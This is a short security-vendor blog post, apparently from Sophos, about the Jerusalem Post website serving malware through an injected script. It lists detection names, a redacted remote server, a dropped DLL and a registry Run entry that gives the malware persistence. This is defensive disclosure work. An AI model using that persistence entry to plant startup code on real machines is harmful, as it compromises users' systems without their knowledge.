Sophos Cloud Optix
A couple of posts on Twitter brought to my attention earlier today that the website of the Jerusalem Post is serving up malware to unsuspecting visitors.
Initially, I suspected that the malware was loaded via a compromised advert stream or one of the popups from the site. However, upon further investigation there were the tell-tale signs of hackers at work on the main site.
SophosLabs is adding detection for this SCRIPT injection as Mal/Badsrc-C.
This particular malicious script would have attempted to load other scripts detected by Sophos as Mal/JSShell-B and Troj/ExpJS-N.
Ultimately, the attack tries to load an EXE (log.exe) detected as Mal/Behav-290.
Mal/Behav-290 includes functionality to:
- run automatically
- access the internet and communicate with a remote server via HTTP
Mal/Behav-290 communicates via HTTP with the following locations:
d .*******. us
When Mal/Behav-290 is installed it creates the file \Microsoft\smx4pnp.dll.
The following registry entry is created to run code exported by smx4pnp.dll on startup:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run smx4pnp rundll32.exe “</user><user>\Microsoft\smx4pnp.dll”, Launch </user>
In the current climate some will assume that the site has been hacked by a politically motivated hacker. However, in my experience the majority of hacks like this are done via a scattergun approach and it was just bad luck (and bad website security) that meant that the Jerusalem Post was the victim.